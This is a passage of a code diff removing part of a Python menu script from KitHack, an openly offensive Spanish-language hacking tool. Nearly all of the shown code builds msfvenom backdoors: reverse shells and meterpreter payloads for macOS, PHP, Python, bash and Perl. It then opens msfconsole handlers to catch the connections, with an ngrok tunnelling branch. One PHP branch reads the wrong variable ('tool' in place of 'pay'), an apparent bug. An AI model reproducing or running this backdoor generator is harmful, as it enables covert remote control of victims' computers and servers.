os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '05': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} php/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[02]{1} php/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[03]{1} php/reverse_php'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = tool.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - if pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '06': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} python/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} python/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} python/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} python/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} python/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} python/shell_reverse_tcp_ssl'.format(WHITE, YELLOW)) - print ('{0}[07]{1} python/shell_reverse_udp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '07': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} cmd/unix/reverse_bash'.format(WHITE, YELLOW)) - print ('{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '08': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} cmd/unix/reverse_perl'.format(WHITE, YELLOW)) - print ('{0}[02]{1} cmd/unix/reverse_perl_ssl'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea 